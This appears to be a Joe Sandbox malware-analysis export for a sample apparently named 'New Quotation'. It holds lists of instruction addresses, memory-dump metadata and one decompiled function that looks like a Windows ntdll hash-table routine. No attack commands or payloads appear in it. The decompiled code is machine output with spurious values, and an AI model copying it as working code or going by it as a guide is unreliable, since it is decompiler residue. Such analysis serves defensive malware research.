                                                                                                                                                                                          0x1d7e9da2
                                                                                                                                                                                          0x1d7e98f0
                                                                                                                                                                                          0x1d7e98f4
                                                                                                                                                                                          0x1d7e98f6
                                                                                                                                                                                          0x1d7e98f6
                                                                                                                                                                                          0x1d7e98f9
                                                                                                                                                                                          0x1d7e98fc
                                                                                                                                                                                          0x1d7e9903
                                                                                                                                                                                          0x1d7e9907
                                                                                                                                                                                          0x1d7e990b
                                                                                                                                                                                          0x1d7e9911
                                                                                                                                                                                          0x1d7e9919
                                                                                                                                                                                          0x1d7e9921
                                                                                                                                                                                          0x1d7e9929
                                                                                                                                                                                          0x1d7e9933
                                                                                                                                                                                          0x1d7e9c49
                                                                                                                                                                                          0x1d7e9c50
                                                                                                                                                                                          0x1d7e9c5b
                                                                                                                                                                                          0x1d7e9c62
                                                                                                                                                                                          0x1d7e9c69
                                                                                                                                                                                          0x1d7e9c72
                                                                                                                                                                                          0x1d7e9c7d
                                                                                                                                                                                          0x1d7e9c85
                                                                                                                                                                                          0x1d7e9939
                                                                                                                                                                                          0x1d7e993d
                                                                                                                                                                                          0x1d7e9943
                                                                                                                                                                                          0x1d8372e9
                                                                                                                                                                                          0x1d8372f0
                                                                                                                                                                                          0x1d8372f0
                                                                                                                                                                                          0x1d7e9949
                                                                                                                                                                                          0x1d7e9950
                                                                                                                                                                                          0x1d7e9957
                                                                                                                                                                                          0x1d7e995e
                                                                                                                                                                                          0x1d7e9965
                                                                                                                                                                                          0x1d7e996e
                                                                                                                                                                                          0x1d7e9972
                                                                                                                                                                                          0x1d7e9975
                                                                                                                                                                                          0x1d7e9975
                                                                                                                                                                                          0x1d7e997b
                                                                                                                                                                                          0x1d7e9983
                                                                                                                                                                                          0x1d7e9983
                                                                                                                                                                                          0x1d7e9992
                                                                                                                                                                                          0x1d7e9995
                                                                                                                                                                                          0x1d7e999c
                                                                                                                                                                                          0x1d7e99a3
                                                                                                                                                                                          0x1d7e99aa
                                                                                                                                                                                          0x1d7e99b2
                                                                                                                                                                                          0x1d8372fa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e99b8
                                                                                                                                                                                          0x1d7e99ba
                                                                                                                                                                                          0x1d837304
                                                                                                                                                                                          0x1d7e9d71
                                                                                                                                                                                          0x1d7e9d73
                                                                                                                                                                                          0x1d7e9bd4
                                                                                                                                                                                          0x1d7e9bd4
                                                                                                                                                                                          0x1d7e9bda
                                                                                                                                                                                          0x1d837496
                                                                                                                                                                                          0x1d83749b
                                                                                                                                                                                          0x1d8374a3
                                                                                                                                                                                          0x1d8374a3
                                                                                                                                                                                          0x1d7e9be0
                                                                                                                                                                                          0x1d7e9be6
                                                                                                                                                                                          0x1d7e9bec
                                                                                                                                                                                          0x1d7e9dad
                                                                                                                                                                                          0x1d7e9db6
                                                                                                                                                                                          0x1d7e9db6
                                                                                                                                                                                          0x1d7e9bf6
                                                                                                                                                                                          0x1d7e9bfe
                                                                                                                                                                                          0x1d7e9bfe
                                                                                                                                                                                          0x1d7e9c02
                                                                                                                                                                                          0x1d7e9c06
                                                                                                                                                                                          0x1d7e9c0c
                                                                                                                                                                                          0x1d7e9c0e
                                                                                                                                                                                          0x1d7e9c10
                                                                                                                                                                                          0x1d7e9c10
                                                                                                                                                                                          0x1d7e9c15
                                                                                                                                                                                          0x1d7e9c1f
                                                                                                                                                                                          0x1d7e9c2a
                                                                                                                                                                                          0x1d8374c4
                                                                                                                                                                                          0x1d8374c9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9c30
                                                                                                                                                                                          0x1d7e9c39
                                                                                                                                                                                          0x1d7e9c3a
                                                                                                                                                                                          0x1d7e9c3b
                                                                                                                                                                                          0x1d7e9c46
                                                                                                                                                                                          0x1d7e9c46
                                                                                                                                                                                          0x1d7e9c2a
                                                                                                                                                                                          0x1d7e9b8e
                                                                                                                                                                                          0x1d7e9b96
                                                                                                                                                                                          0x1d7e9b98
                                                                                                                                                                                          0x1d7e9ba1
                                                                                                                                                                                          0x1d837482
                                                                                                                                                                                          0x1d83748b
                                                                                                                                                                                          0x1d83748b
                                                                                                                                                                                          0x1d7e9bb0
                                                                                                                                                                                          0x1d7e9bb9
                                                                                                                                                                                          0x1d7e9bbb
                                                                                                                                                                                          0x1d7e9bbd
                                                                                                                                                                                          0x1d7e9bbd
                                                                                                                                                                                          0x1d7e9bb9
                                                                                                                                                                                          0x1d7e9bcc
                                                                                                                                                                                          0x1d7e9bd1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9bd1
                                                                                                                                                                                          0x1d7e99c2
                                                                                                                                                                                          0x1d7e9c97
                                                                                                                                                                                          0x1d7e99d4
                                                                                                                                                                                          0x1d7e99d6
                                                                                                                                                                                          0x1d7e99d8
                                                                                                                                                                                          0x1d7e99dc
                                                                                                                                                                                          0x1d7e99df
                                                                                                                                                                                          0x1d7e99e2
                                                                                                                                                                                          0x1d7e99e6
                                                                                                                                                                                          0x1d7e99ec
                                                                                                                                                                                          0x1d7e9a3a
                                                                                                                                                                                          0x1d7e9a3a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e99f4
                                                                                                                                                                                          0x1d7e99f8
                                                                                                                                                                                          0x1d7e9a0e
                                                                                                                                                                                          0x1d7e9a12
                                                                                                                                                                                          0x1d7e9cb5
                                                                                                                                                                                          0x1d7e9a1d
                                                                                                                                                                                          0x1d7e9a1d
                                                                                                                                                                                          0x1d7e9a1f
                                                                                                                                                                                          0x1d7e9a21
                                                                                                                                                                                          0x1d837320
                                                                                                                                                                                          0x1d837320
                                                                                                                                                                                          0x1d837324
                                                                                                                                                                                          0x1d7e9a3c
                                                                                                                                                                                          0x1d7e9a3e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9a46
                                                                                                                                                                                          0x1d7e9d0a
                                                                                                                                                                                          0x1d7e9d0e
                                                                                                                                                                                          0x1d7e9d12
                                                                                                                                                                                          0x1d7e9d12
                                                                                                                                                                                          0x1d7e9a51
                                                                                                                                                                                          0x1d7e9a59
                                                                                                                                                                                          0x1d7e9a5e
                                                                                                                                                                                          0x1d83732d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9a64
                                                                                                                                                                                          0x1d7e9a64
                                                                                                                                                                                          0x1d7e9a6d
                                                                                                                                                                                          0x1d7e9a84
                                                                                                                                                                                          0x1d7e9a88
                                                                                                                                                                                          0x1d7e9b13
                                                                                                                                                                                          0x1d7e9b13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9aa1
                                                                                                                                                                                          0x1d7e9aa1
                                                                                                                                                                                          0x1d7e9aa8
                                                                                                                                                                                          0x1d8373a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8373a8
                                                                                                                                                                                          0x1d7e9aae
                                                                                                                                                                                          0x1d7e9ab6
                                                                                                                                                                                          0x1d7e9ada
                                                                                                                                                                                          0x1d7e9ade
                                                                                                                                                                                          0x1d7e9b1d
                                                                                                                                                                                          0x1d7e9b1d
                                                                                                                                                                                          0x1d7e9b23
                                                                                                                                                                                          0x1d7e9d1c
                                                                                                                                                                                          0x1d7e9d21
                                                                                                                                                                                          0x1d7e9d29
                                                                                                                                                                                          0x1d7e9d29
                                                                                                                                                                                          0x1d7e9b29
                                                                                                                                                                                          0x1d7e9b2b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9b31
                                                                                                                                                                                          0x1d7e9b55
                                                                                                                                                                                          0x1d7e9b5a
                                                                                                                                                                                          0x1d7e9d3d
                                                                                                                                                                                          0x1d7e9d3f
                                                                                                                                                                                          0x1d837430
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837446
                                                                                                                                                                                          0x1d837446
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837446
                                                                                                                                                                                          0x1d837430
                                                                                                                                                                                          0x1d7e9d45
                                                                                                                                                                                          0x1d7e9d45
                                                                                                                                                                                          0x1d7e9d4b
                                                                                                                                                                                          0x1d837469
                                                                                                                                                                                          0x1d83746d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83747b
                                                                                                                                                                                          0x1d83747b
                                                                                                                                                                                          0x1d7e9d51
                                                                                                                                                                                          0x1d7e9d5d
                                                                                                                                                                                          0x1d7e9d61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9d67
                                                                                                                                                                                          0x1d7e9d6d
                                                                                                                                                                                          0x1d7e9dc4
                                                                                                                                                                                          0x1d7e9dc4
                                                                                                                                                                                          0x1d7e9d6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9d6f
                                                                                                                                                                                          0x1d7e9b62
                                                                                                                                                                                          0x1d7e9ca4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837427
                                                                                                                                                                                          0x1d7e9b6a
                                                                                                                                                                                          0x1d7e9b7b
                                                                                                                                                                                          0x1d7e9b84
                                                                                                                                                                                          0x1d7e9b88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9b88
                                                                                                                                                                                          0x1d7e9b68
                                                                                                                                                                                          0x1d7e9b68
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837403
                                                                                                                                                                                          0x1d837408
                                                                                                                                                                                          0x1d83740f
                                                                                                                                                                                          0x1d837418
                                                                                                                                                                                          0x1d83741c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837422
                                                                                                                                                                                          0x1d7e9b31
                                                                                                                                                                                          0x1d7e9ae5
                                                                                                                                                                                          0x1d7e9ae9
                                                                                                                                                                                          0x1d7e9aeb
                                                                                                                                                                                          0x1d7e9aee
                                                                                                                                                                                          0x1d7e9af2
                                                                                                                                                                                          0x1d7e9af6
                                                                                                                                                                                          0x1d7e9afa
                                                                                                                                                                                          0x1d8373ad
                                                                                                                                                                                          0x1d8373b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8373c7
                                                                                                                                                                                          0x1d8373d1
                                                                                                                                                                                          0x1d8373d6
                                                                                                                                                                                          0x1d8373d9
                                                                                                                                                                                          0x1d8373de
                                                                                                                                                                                          0x1d8373e1
                                                                                                                                                                                          0x1d8373e4
                                                                                                                                                                                          0x1d8373e9
                                                                                                                                                                                          0x1d8373f2
                                                                                                                                                                                          0x1d8373f6
                                                                                                                                                                                          0x1d8373f9
                                                                                                                                                                                          0x1d7e9b0a
                                                                                                                                                                                          0x1d7e9b0d
                                                                                                                                                                                          0x1d7e9d84
                                                                                                                                                                                          0x1d7e9dc8
                                                                                                                                                                                          0x1d7e9d86
                                                                                                                                                                                          0x1d7e9d86
                                                                                                                                                                                          0x1d7e9d86
                                                                                                                                                                                          0x1d7e9d8a
                                                                                                                                                                                          0x1d7e9d8e
                                                                                                                                                                                          0x1d7e9d92
                                                                                                                                                                                          0x1d7e9b17
                                                                                                                                                                                          0x1d7e9b17
                                                                                                                                                                                          0x1d7e9b1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9b1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9b0d
                                                                                                                                                                                          0x1d8373b6
                                                                                                                                                                                          0x1d7e9b00
                                                                                                                                                                                          0x1d7e9b00
                                                                                                                                                                                          0x1d7e9b05
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9b05
                                                                                                                                                                                          0x1d7e9a88
                                                                                                                                                                                          0x1d7e9a6f
                                                                                                                                                                                          0x1d7e9a75
                                                                                                                                                                                          0x1d83733b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837341
                                                                                                                                                                                          0x1d837348
                                                                                                                                                                                          0x1d837357
                                                                                                                                                                                          0x1d837392
                                                                                                                                                                                          0x1d837392
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837392
                                                                                                                                                                                          0x1d837359
                                                                                                                                                                                          0x1d837360
                                                                                                                                                                                          0x1d83736b
                                                                                                                                                                                          0x1d837388
                                                                                                                                                                                          0x1d83738c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83738c
                                                                                                                                                                                          0x1d83736d
                                                                                                                                                                                          0x1d837374
                                                                                                                                                                                          0x1d83737b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9a75
                                                                                                                                                                                          0x1d7e9a5e
                                                                                                                                                                                          0x1d7e9a2c
                                                                                                                                                                                          0x1d7e9cc0
                                                                                                                                                                                          0x1d7e9cc7
                                                                                                                                                                                          0x1d7e9ccf
                                                                                                                                                                                          0x1d7e9cd5
                                                                                                                                                                                          0x1d7e9cdc
                                                                                                                                                                                          0x1d7e9cf1
                                                                                                                                                                                          0x1d7e9cf5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9cfb
                                                                                                                                                                                          0x1d7e9cff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9cff
                                                                                                                                                                                          0x1d7e9a32
                                                                                                                                                                                          0x1d7e9a36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9a36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9cbb
                                                                                                                                                                                          0x1d7e9a18
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e9a18
                                                                                                                                                                                          0x1d837316
                                                                                                                                                                                          0x1d837316
                                                                                                                                                                                          0x1d837316
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837316
                                                                                                                                                                                          0x1d7e9c97
                                                                                                                                                                                          0x1d7e99ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e99ca

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                                                          • API String ID: 0-3393094623
                                                                                                                                                                                          • Opcode ID: 02ac3bf3904d58ef25790b85dea49360c2a21d8edaa1a61a05ccbb68c0dbf9e9
                                                                                                                                                                                          • Instruction ID: d5fb521af4ab46721645c032c9318a2fd8216c5210f8e2974c15c25d5a913124
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ac3bf3904d58ef25790b85dea49360c2a21d8edaa1a61a05ccbb68c0dbf9e9
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE027D72908351DFD721CF25C480BABB7E5BF88BA4F41891EE8998B250E770D844CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8AACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E1D8AACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x1d8aabd2
						_v24 = _t12;
						_t149 = L1D7D53C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x1d8aabd2
									E1D7D52F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x1d8c91e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L1D7E2330(E1D8188C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x1d8aabd2
																E1D7E24D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x1d8c91e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E1D804CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_push("true");
																_pop(_t383);
															}
															 *0x1d8c91e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
																_t288 = _t383 - 1;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x1d8c91e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E1D8AAC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E1D8AACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E1D8AAC6F(_t31) == 0) {
									_t364 = 0;
								}
								E1D7D52F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E1D8AACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}












































































                                                                                                                                                                                          0x1d8aacf4
                                                                                                                                                                                          0x1d8aacf6
                                                                                                                                                                                          0x1d8aacfb
                                                                                                                                                                                          0x1d8aacfe
                                                                                                                                                                                          0x1d8aad05
                                                                                                                                                                                          0x1d8aad05
                                                                                                                                                                                          0x1d8aad08
                                                                                                                                                                                          0x1d8aad0e
                                                                                                                                                                                          0x1d8aad6f
                                                                                                                                                                                          0x1d8aad6f
                                                                                                                                                                                          0x1d8aad72
                                                                                                                                                                                          0x1d8aadc8
                                                                                                                                                                                          0x1d8aadce
                                                                                                                                                                                          0x1d8aadd0
                                                                                                                                                                                          0x1d8aadd0
                                                                                                                                                                                          0x1d8aadd3
                                                                                                                                                                                          0x1d8aadd7
                                                                                                                                                                                          0x1d8aadda
                                                                                                                                                                                          0x1d8aaddf
                                                                                                                                                                                          0x1d8aade1
                                                                                                                                                                                          0x1d8aade1
                                                                                                                                                                                          0x1d8aade1
                                                                                                                                                                                          0x1d8aade1
                                                                                                                                                                                          0x1d8aadec
                                                                                                                                                                                          0x1d8aadf0
